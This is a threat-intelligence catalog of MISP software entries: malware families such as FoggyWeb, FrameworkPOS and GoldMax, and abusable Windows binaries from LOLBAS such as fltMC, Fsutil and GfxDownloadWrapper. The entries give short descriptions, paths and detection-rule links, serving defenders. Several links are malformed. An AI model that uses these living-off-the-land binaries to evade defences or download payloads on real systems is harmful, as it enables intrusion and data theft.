This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Filter Manager Control Program used by Windows

Author: John Lambert

Paths: * C:\Windows\System32\fltMC.exe

Detection: * Sigma: [proc_creation_win_fltmc_unload_driver_sysmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml) * Elastic: [defense_evasion_via_filter_manager.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml) * Splunk: [unload_sysmon_filter_driver.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml) * IOC: 4688 events with fltMC.exe<sup>[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]</sup>

The tag is: misp-galaxy:software="fltMC"

FoggyWeb

[FoggyWeb](https://app.tidalcyber.com/software/bc11844e-0348-4eed-a48a-0554d68db38c) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least early April 2021.<sup>[[MSTIC FoggyWeb September 2021](https://app.tidalcyber.com/references/1ef61100-c5e7-4725-8456-e508c5f6d68a)]</sup>

The tag is: misp-galaxy:software="FoggyWeb"

Forfiles.exe - Associated Software

The tag is: misp-galaxy:software="Forfiles.exe - Associated Software"

Forfiles

[Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. <sup>[[Microsoft Forfiles Aug 2016](https://app.tidalcyber.com/references/fd7eaa47-3512-4dbd-b881-bc679d06cd1b)]</sup>

The tag is: misp-galaxy:software="Forfiles"

Trinity - Associated Software

<sup>[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]</sup>

The tag is: misp-galaxy:software="Trinity - Associated Software"

FrameworkPOS

[FrameworkPOS](https://app.tidalcyber.com/software/aef7cbbc-5163-419c-8e4b-3f73bed50474) is a point of sale (POS) malware used by [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) to steal payment card data from sytems that run physical POS devices.<sup>[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]</sup>

The tag is: misp-galaxy:software="FrameworkPOS"

FreeFileSync

FreeFileSync is a tool used to facilitate cloud-based file synchronization.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="FreeFileSync"

FruitFly

FruitFly is designed to spy on mac users <sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup>.

The tag is: misp-galaxy:software="FruitFly"

Fsi.exe - Associated Software

<sup>[[Fsi.exe - LOLBAS Project](/references/4e14e87f-2ad9-4959-8cb2-8585b67931c0)]</sup>

The tag is: misp-galaxy:software="Fsi.exe - Associated Software"

Fsi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.

Author: Jimmy (@bohops)

Paths: * C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

The tag is: misp-galaxy:software="Fsi"

FsiAnyCpu.exe - Associated Software

<sup>[[FsiAnyCpu.exe - LOLBAS Project](/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]</sup>

The tag is: misp-galaxy:software="FsiAnyCpu.exe - Associated Software"

FsiAnyCpu

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe

Detection: * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines * Sigma: [proc_creation_win_lolbin_fsharp_interpreters.yml]([FsiAnyCpu.exe - LOLBAS Project(/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]</sup>

The tag is: misp-galaxy:software="FsiAnyCpu"

Fsutil.exe - Associated Software

<sup>[[Fsutil.exe - LOLBAS Project](/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]</sup>

The tag is: misp-galaxy:software="Fsutil.exe - Associated Software"

Fsutil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: File System Utility

Author: Elliot Killick

Paths: * C:\Windows\System32\fsutil.exe * C:\Windows\SysWOW64\fsutil.exe

Detection: * IOC: fsutil.exe should not be run on a normal workstation * IOC: file setZeroData (not case-sensitive) in the process arguments * IOC: Sysmon Event ID 1 * IOC: Execution of process fsutil.exe with trace decode could be suspicious * IOC: Non-Windows netsh.exe execution * Sigma: [proc_creation_win_susp_fsutil_usage.yml]([Fsutil.exe - LOLBAS Project(/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]</sup>

The tag is: misp-galaxy:software="Fsutil"

ftp.exe - Associated Software

The tag is: misp-galaxy:software="ftp.exe - Associated Software"

ftp

[ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.<sup>[[Microsoft FTP](https://app.tidalcyber.com/references/970f8d16-f5b7-44e2-b81f-738b931c60d9)]</sup><sup>[[Linux FTP](https://app.tidalcyber.com/references/021ea6bc-abff-48de-a6bb-315dbbfa6147)]</sup>

The tag is: misp-galaxy:software="ftp"

FunnyDream

[FunnyDream](https://app.tidalcyber.com/software/d0490e1d-8287-44d3-8342-944d1203b237) is a backdoor with multiple components that was used during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign since at least 2019, primarily for execution and exfiltration.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup>

The tag is: misp-galaxy:software="FunnyDream"

DILLJUICE stage2 - Associated Software

The tag is: misp-galaxy:software="DILLJUICE stage2 - Associated Software"

Fysbis

The tag is: misp-galaxy:software="Fysbis"

WhiteBear - Associated Software

The term WhiteBear is used both for the activity group (a subset of G0010) as well as the malware observed. Based on similarities in behavior and C2, WhiteBear is assessed to be the same as S0168. <sup>[[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)]</sup><sup>[[ESET Crutch December 2020](https://app.tidalcyber.com/references/8b2f40f5-7dca-4edf-8314-a8f5bc4831b8)]</sup>

The tag is: misp-galaxy:software="WhiteBear - Associated Software"

Gelsevirine - Associated Software

The tag is: misp-galaxy:software="Gelsevirine - Associated Software"

Gelsenicine - Associated Software

The tag is: misp-galaxy:software="Gelsenicine - Associated Software"

Gelsemine - Associated Software

The tag is: misp-galaxy:software="Gelsemine - Associated Software"

Gelsemium

[Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) has been used by the Gelsemium group since at least 2014.<sup>[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]</sup>

The tag is: misp-galaxy:software="Gelsemium"

GeminiDuke

The tag is: misp-galaxy:software="GeminiDuke"

GfxDownloadWrapper.exe - Associated Software

<sup>[[GfxDownloadWrapper.exe - LOLBAS Project](/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]</sup>

The tag is: misp-galaxy:software="GfxDownloadWrapper.exe - Associated Software"

GfxDownloadWrapper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.

Author: Jesus Galvez

Paths: * c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ * c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ * c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ * c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ * c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ * c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ * c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ * c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ * c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ * c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ * c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ * c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ * c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ * c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ * c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ * c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ * c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ * c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ * c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ * c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ * c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ * c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ * c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ * c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ * c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ * c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ * c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ * c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ * c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ * c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ * c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ * c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ * c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ * c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ * c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ * c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ * c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ * c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ * c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ * c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ * c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\

Detection: * Sigma: [proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml) * IOC: [Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.](Usually GfxDownloadWrapper downloads a JSON file from [GfxDownloadWrapper.exe - LOLBAS Project(/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]</sup>

The tag is: misp-galaxy:software="GfxDownloadWrapper"

Moudoor - Associated Software

The tag is: misp-galaxy:software="Moudoor - Associated Software"

Mydoor - Associated Software

The tag is: misp-galaxy:software="Mydoor - Associated Software"

gh0st RAT

[gh0st RAT](https://app.tidalcyber.com/software/269ef8f5-35c8-44ba-afe4-63f4c6431427) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.<sup>[[FireEye Hacking Team](https://app.tidalcyber.com/references/c1e798b8-6771-4ba7-af25-69c640321e40)]</sup><sup>[[Arbor Musical Chairs Feb 2018](https://app.tidalcyber.com/references/bddf44bb-7a0a-498b-9831-7b73cf9a582e)]</sup><sup>[[Nccgroup Gh0st April 2018](https://app.tidalcyber.com/references/4476aa0a-b1ef-4ac6-9e44-5721a0b3e92b)]</sup>

The tag is: misp-galaxy:software="gh0st RAT"

Trojan.GTALK - Associated Software

The tag is: misp-galaxy:software="Trojan.GTALK - Associated Software"

GLOOXMAIL

The tag is: misp-galaxy:software="GLOOXMAIL"

GMER

GMER is a tool used to remove rootkits.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="GMER"

Gold Dragon

[Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) was used along with [Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0) and [RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. <sup>[[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]</sup>

The tag is: misp-galaxy:software="Gold Dragon"

GoldenSpy

[GoldenSpy](https://app.tidalcyber.com/software/1b135393-c799-4698-a880-c6a86782adee) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://app.tidalcyber.com/software/1b135393-c799-4698-a880-c6a86782adee) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.<sup>[[Trustwave GoldenSpy June 2020](https://app.tidalcyber.com/references/2a27a2ea-2815-4d97-88c0-47a6e04e84f8)]</sup>

The tag is: misp-galaxy:software="GoldenSpy"

GoldFinder

[GoldFinder](https://app.tidalcyber.com/software/4e8c58c5-443e-4f73-91e9-89146f04e307) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://app.tidalcyber.com/software/4e8c58c5-443e-4f73-91e9-89146f04e307) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) by [APT29]([MSTIC NOBELIUM Mar 2021(https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup>

The tag is: misp-galaxy:software="GoldFinder"

SUNSHUTTLE - Associated Software

The tag is: misp-galaxy:software="SUNSHUTTLE - Associated Software"

GoldMax

[GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a), and has likely been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least mid-2019. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.<sup>[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup><sup>[[FireEye SUNSHUTTLE Mar 2021](https://app.tidalcyber.com/references/1cdb8a1e-fbed-4db3-b273-5f8f45356dc1)]</sup><sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:software="GoldMax"

Goopy

[Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) is a Windows backdoor and Trojan used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) and shares several similarities to another backdoor used by the group ([Denis](https://app.tidalcyber.com/software/df4002d2-f557-4f95-af7a-9a4582fb7068)). [Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) is named for its impersonation of the legitimate Google Updater executable.<sup>[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)]</sup>

The tag is: misp-galaxy:software="Goopy"

Gpscript.exe - Associated Software

<sup>[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]</sup>

